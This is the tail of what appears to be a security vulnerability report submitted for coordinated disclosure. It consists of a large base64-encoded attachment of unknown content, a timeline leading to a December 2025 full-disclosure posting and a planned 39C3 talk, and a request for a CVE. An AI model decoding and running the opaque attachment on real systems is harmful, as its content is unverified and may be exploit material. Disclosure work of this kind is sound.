B5Uc0PzbL/A4AQTjHl5zXJtQE6Btq+H5zzOfXggYMQ3oHcpH9D7Ai1Wh6bUnd6/1Ytv8BSPSZ1x8
DZZc0XgsFrI+UlCh/uDUT48oUKgbjs1bYRK6FS8ZHCYEe0+UfWBII6Tg9DIQpglbFd4pLW7Zmq9P
bLxotnoH1zgwljBBCC48vPoNVmeIxN2sbJdpyRdBnNUSW0LlTI8V+Z+Z2dsVggyQvLGZIzJ/N61x
caowQPLaciQypBWLyiUgf4XxZtE+9NOE8hJ9zERejXbP7sS3RfmtlWlAT3maD6sg7U0+yIvNtLUG
3UigRcxcy8PdOYawEMWWohb79SS4+acLDPdBTr8pJ89YGw0nX3QFxOSktmIaZ7FejP0/YeZVpg5Z
K1XejPnjkgMUxvkaSPJqW6+W32YRyX/M8rnUgHOlU7359LZuNaUdkwN99OrP7nPNRoPv2YCXeZtv
KMTO92Pzr8XMWRGc95GV9U5Mr0UVdO3f+zRXJxS3B4QZfweYfnfL2JbyILPQy0helQRhBE0wvmhx
dZ8nnpP8OZBiYt7oEgHgOnBJ9ZfxUX9/AEkH5dgUGrAMMMF2Egg9GI7WOMdPTlZv53bRJWxIATo7
3r3THZBvVxCGYgh67oG6A2ozJl+CMgt4LIrsO68owkWy3f4gbpr7vyANg4+erz4AA5OMQ/XmPFcn
lWXoGaWB3w4FFzooLFvlPNpptHF0soqV/JKtQrEwMIUIl8VPnXkVNgrbkO6RlYHZLBLlhYJlXouG
dVbvDDUGlGRghUrrZPIlMSd21ndx7SflD0D4VotEtNNjGYx2v/900fFz0IdT9shxBthBDKlDy84c
s4ogH1ZzBcZuhKeibO5e9fZYLroIDRv4pyuzO1pwos/AZlpwg01dwxWp06wqsb65P+HFbLxN+nI3
TnntkhJg2ay1R35Ywh0hG9bd2z0OUGGI6Z3gvn5nrFNiS8n4hdzdocXT7p5VoXHGCdrzQzv1y/Wu
5yBFvE5WBqsUmwbzgboRaTJEAziXNu+PfFNWIYhuORVAQNjBJaqyW0QkPDEzuKGA7RZwMGs5vs5g
FJCRZsh2UVa5WnKbRMdGQjWPQ1JXW+fHV0Lyo6NTgqL9ecRiqAAAAPgyEHPOY​VHPAAH3M4CUAwD+
yi0RscRn+wIAAAAABFla
```

---

Disclosure Timeline:

- 21.10.2025: Submission of initial version of this report.

Upcoming Timeline:

- 24.10.2025: Submission of a talk for the 39th Chaos Communication Congress (39C3). No technical details shared.
- 21.12.2025: Disclosure of this report on https://seclists.org/fulldisclosure/
- 26-31.12.2025: If accepted by the content team, 39C3 Congress talk regarding this report.

Please note: While we might be able to offer some flexibility, our plan is to adhere to the above stated upcoming timeline, regardless of the availability of patches or fixes.
We kindly request allocation of a CVE number to track this issue. Please keep us updated regarding your remediation efforts.

Thank you

Best,
Liam